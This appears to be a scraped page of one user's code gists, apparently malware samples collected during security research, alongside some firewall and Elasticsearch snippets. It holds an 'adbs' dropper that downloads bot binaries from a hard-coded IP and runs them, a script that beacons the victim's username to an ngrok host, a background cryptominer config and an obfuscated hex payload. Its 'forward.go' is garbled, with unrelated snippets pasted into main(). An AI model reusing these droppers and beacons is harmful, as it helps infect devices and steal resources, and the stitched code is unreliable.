Remco Verhoef nl5887

## gist:9cb88cf2ef9849d3873b611bce3b0aaa
A1/knnUWULU2NiOgmM//YB9bTMpU+Zg3JfBube+UUTbHcbV0/akpEn/3VnZb7lYTDCxazq0efcDarXzQK6X1Xnk4pAYgqCOhlLjjqhSLWk6Uy+c8Fd0Q69dhMG4neFv2HbTohqdIrv+5iixaKhxP3lMJVW5TAiuRJrHiMA5z4MxgTX89Oz8jM+S5bcQhKVPfk8LrRLFk2Zlp7hj68e2Cqaa/wQC8osJPLm/Y/ejJgjQg4WpHJ+bEEZWIRmr0dhsZLYSWBn1FEMzv43KkrDAmb1gM9G63Llxj8MfZlOcZXcnDgn7e4ytoL56mkcBUOEYmG/5JJ2OQvIkcheq+77rztisgsPxSVdo+KQyVbYrCvFCHb2Eh
A1/kzSIfAKdirHqv4ILCwBmTbiutpRbIQIGZJ38p5ugwNTjDYvnj73yC/sZbhoIXG/x4OwI4SgwijkqkiBELYSBf13gS5Y1pxnswZuhytjkpsBpBUCmsggE27TRtm9BD9V+BuQOIlPigmmJ6G+4dWnc4kCNkdh/4ga7Ym2AzuPDK0TgDkyds4OSkh271uGC0Q6WC0YleKGaF6oi1rMSUhI8NqzBtVTwNafUR49t0LxArB9DQuSzbGVqXBnPZpSKsfkq0Wv+vaDekCouZ6vFQ2YPXr8IxRXoxxGHgJVuANxPPb3jzHcSgo76BX2i4OLNeS1k1lZqmgUc7qz7XgNxlnTAKaSAu4kLjgZkrE8tpFU3LqFRece8D84Sy
A16zzHwSVQTcEZqvZ61pmw0hpca/WzVMF2kP89s5/9I4y2J47hcQidU1h4pzyZdA0F5QtAzrEKkveIpAQEPdX3/74CBVf5qE49Dmy6Od4YQgpEoX2KXGrHUJC+HsVZUr5efGu1H1aLiZH1Y/0mxvzVRuYZDN01jLAXDhTEOfFbAarX86B5ckT/3VdO2gdNvvku/26rHdLC0SbiwyfElwCz9SMePTI+TT5hlnmh2oTwzy5+UwUUBVwJAAU2LkT2OAIOzdPpWVvSLYSKRqP7xaPI

## gist:9f3413ed486b117134c59aa4daee17b8
MD5 (/Users/remco/Downloads/paimon.x86) = 5efce325c5aa2fa11553bf6a4bd94b74

arch     x86
baddr    0x8048000
binsz    37184
bintype  elf
bits     32
canary   false
sanitiz  false
class    ELF32

## config.json
{
    "algo": "cryptonight", // cryptonight (default) or cryptonight-lite
    "av": 0, // algorithm variation, 0 auto select
    "background": true, // true to run the miner in the background
    "colors": true, // false to disable colored output
    "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
    "cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
    "donate-level": 3, // donate level, mininum 1%
    "log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
    "max-cpu-usage": 65, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.

## payloadA.js
function d() {
    function decode(codedString) {
        return Buffer.from(codedString, "hex").toString();
    }

    var data = ["75d4c87f3f69e0fa292969072c49dff4f90f44c1385d8eb60dae4cc3a229e52cf61f78b0822353b4304e323ad563bc22c98421eb6a8c1917e30277f716452ee8d57f9838e00f0c4e4ebd7818653f00e72888a4031676d8e2a80ca3cb00a7396ae3d140135d97c6db00cab172cbf9a92d0b9fb0f73ff2ee4d38c7f6f4b30990f2c97ef39ae6ac6c828f5892dd8457ab530a519cd236ebd51e1703bcfca8f9441c2664903af7e527c420d9263f4af58ccb5843187aa0da1cbb4b6aedfd1bdc6faf32f38a885628612660af8630597969125c917dfc512c53453c96c143a2a058ba91bc37e265b44c5874e594caaf53961c82904a95f1dd33b94e4dd1d00e9878f66dafc55fa6f2f77ec7e7e8fe28e4f959eab4707557b263ec74b2764033cd343199eeb6140a6284cb009a09b143dce784c2cd40dc320777deea6fbdf183f787fa7dd3ce2139999343b488a4f5bcf3743eecf0d30928727025ff3549808f7f711c9f7614148cf43c8aa7ce9b3fcc1cff4bb0df75cb2021d0f4afe5784fa80fed245ee3f0911762fffbc36951a78457b94629f067c1f12927cdf97699656f4a2c4429f1279c4ebacde10fa7a6f5c44b14bc88322a3f06bb0847f0456e63088

## ngrok.sh
export HOST="http://0c9afa50.ngrok.io"
export RIP="97cc76838c10360ea07e82b225d1d306"

reportinfo() {
  local _usr="$(whoami 2>/dev/null)"
  local _url="$HOST/m?o=$(pido)&r=${RIP}&t=${PROCS}&l=d&u=${_usr}"

  if type "wget" >/dev/null 2>&1 ; then
    wget -q "${_url}" >/dev/null 2>&1
  elif type "curl" >/dev/null 2>&1 ; then

## gist:2dc04e80c09286a687a957f61b35e123
ipset create blocklist iphash
iptables -A INPUT -m set --match-set blocklist src -j DROP
ipset add blocklist {ip}

## gist:32cf9f5f5155991367ca58dd37cfd8ae
-A DOCKER-USER -i eth0 -j DROP
-A DOCKER-USER -j RETURN

## gist:d994f61adf9b052d48ad3f0c16c5b130
cat json3 | jq -c '{ "index": {"_index": "bang", "_type": "file"}}, . + { "firmware": "json3" }' | curl -s -H "Content-Type: application/json" -XPUT "http://127.0.0.1:9200/_bulk" --data-binary @-

## adbs
#!/bin/sh
n="arm.bot.le mips.bot.be mipsel.bot.le arm7.bot.le x86_64.bot.le i586.bot.le i686.bot.le"
http_server="95.215.62.169"
for a in $n
    cp /system/bin/sh $a
    >$a
    busybox wget http://$http_server/$a -O -> $a
    chmod 777 $a
    ./$a
done

## forward.go
package main

import (
	"fmt"
	"io"
	"net"
	"os"
)

func main() {
	A1/knnUWULU2NiOgmM//YB9bTMpU+Zg3JfBube+UUTbHcbV0/akpEn/3VnZb7lYTDCxazq0efcDarXzQK6X1Xnk4pAYgqCOhlLjjqhSLWk6Uy+c8Fd0Q69dhMG4neFv2HbTohqdIrv+5iixaKhxP3lMJVW5TAiuRJrHiMA5z4MxgTX89Oz8jM+S5bcQhKVPfk8LrRLFk2Zlp7hj68e2Cqaa/wQC8osJPLm/Y/ejJgjQg4WpHJ+bEEZWIRmr0dhsZLYSWBn1FEMzv43KkrDAmb1gM9G63Llxj8MfZlOcZXcnDgn7e4ytoL56mkcBUOEYmG/5JJ2OQvIkcheq+77rztisgsPxSVdo+KQyVbYrCvFCHb2Eh
	A1/kzSIfAKdirHqv4ILCwBmTbiutpRbIQIGZJ38p5ugwNTjDYvnj73yC/sZbhoIXG/x4OwI4SgwijkqkiBELYSBf13gS5Y1pxnswZuhytjkpsBpBUCmsggE27TRtm9BD9V+BuQOIlPigmmJ6G+4dWnc4kCNkdh/4ga7Ym2AzuPDK0TgDkyds4OSkh271uGC0Q6WC0YleKGaF6oi1rMSUhI8NqzBtVTwNafUR49t0LxArB9DQuSzbGVqXBnPZpSKsfkq0Wv+vaDekCouZ6vFQ2YPXr8IxRXoxxGHgJVuANxPPb3jzHcSgo76BX2i4OLNeS1k1lZqmgUc7qz7XgNxlnTAKaSAu4kLjgZkrE8tpFU3LqFRece8D84Sy
	A16zzHwSVQTcEZqvZ61pmw0hpca/WzVMF2kP89s5/9I4y2J47hcQidU1h4pzyZdA0F5QtAzrEKkveIpAQEPdX3/74CBVf5qE49Dmy6Od4YQgpEoX2KXGrHUJC+HsVZUr5efGu1H1aLiZH1Y/0mxvzVRuYZDN01jLAXDhTEOfFbAarX86B5ckT/3VdO2gdNvvku/26rHdLC0SbiwyfElwCz9SMePTI+TT5hlnmh2oTwzy5+UwUUBVwJAAU2LkT2OAIOzdPpWVvSLYSKRqP7xaPI
	MD5 (/Users/remco/Downloads/paimon.x86) = 5efce325c5aa2fa11553bf6a4bd94b74

	arch x86
	baddr 0x8048000
	binsz 37184
	bintype elf
	bits 32
	canary false
	sanitiz false
	class ELF32
	{
	"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
	"av": 0, // algorithm variation, 0 auto select
	"background": true, // true to run the miner in the background
	"colors": true, // false to disable colored output
	"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
	"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
	"donate-level": 3, // donate level, mininum 1%
	"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
	"max-cpu-usage": 65, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
	function d() {
	function decode(codedString) {
	return Buffer.from(codedString, "hex").toString();
	}

	var data = ["75d4c87f3f69e0fa292969072c49dff4f90f44c1385d8eb60dae4cc3a229e52cf61f78b0822353b4304e323ad563bc22c98421eb6a8c1917e30277f716452ee8d57f9838e00f0c4e4ebd7818653f00e72888a4031676d8e2a80ca3cb00a7396ae3d140135d97c6db00cab172cbf9a92d0b9fb0f73ff2ee4d38c7f6f4b30990f2c97ef39ae6ac6c828f5892dd8457ab530a519cd236ebd51e1703bcfca8f9441c2664903af7e527c420d9263f4af58ccb5843187aa0da1cbb4b6aedfd1bdc6faf32f38a885628612660af8630597969125c917dfc512c53453c96c143a2a058ba91bc37e265b44c5874e594caaf53961c82904a95f1dd33b94e4dd1d00e9878f66dafc55fa6f2f77ec7e7e8fe28e4f959eab4707557b263ec74b2764033cd343199eeb6140a6284cb009a09b143dce784c2cd40dc320777deea6fbdf183f787fa7dd3ce2139999343b488a4f5bcf3743eecf0d30928727025ff3549808f7f711c9f7614148cf43c8aa7ce9b3fcc1cff4bb0df75cb2021d0f4afe5784fa80fed245ee3f0911762fffbc36951a78457b94629f067c1f12927cdf97699656f4a2c4429f1279c4ebacde10fa7a6f5c44b14bc88322a3f06bb0847f0456e63088
	export HOST="http://0c9afa50.ngrok.io"
	export RIP="97cc76838c10360ea07e82b225d1d306"

	reportinfo() {
	local _usr="$(whoami 2>/dev/null)"
	local _url="$HOST/m?o=$(pido)&r=${RIP}&t=${PROCS}&l=d&u=${_usr}"

	if type "wget" >/dev/null 2>&1 ; then
	wget -q "${_url}" >/dev/null 2>&1
	elif type "curl" >/dev/null 2>&1 ; then
	ipset create blocklist iphash
	iptables -A INPUT -m set --match-set blocklist src -j DROP
	ipset add blocklist {ip}
	#!/bin/sh
	n="arm.bot.le mips.bot.be mipsel.bot.le arm7.bot.le x86_64.bot.le i586.bot.le i686.bot.le"
	http_server="95.215.62.169"
	for a in $n
	cp /system/bin/sh $a
	>$a
	busybox wget http://$http_server/$a -O -> $a
	chmod 777 $a
	./$a
	done